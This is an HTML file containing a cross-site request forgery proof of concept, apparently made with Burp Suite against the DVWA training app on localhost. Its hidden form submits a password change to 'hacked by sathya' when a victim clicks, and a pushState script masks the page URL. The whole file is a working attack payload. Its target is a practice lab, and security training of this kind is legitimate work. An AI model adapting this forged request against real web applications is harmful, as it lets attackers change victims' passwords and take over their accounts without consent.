<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/DVWA/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="hacked&#32;by&#32;sathya" />
      <input type="hidden" name="password&#95;conf" value="hacked&#32;by&#32;sathya" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
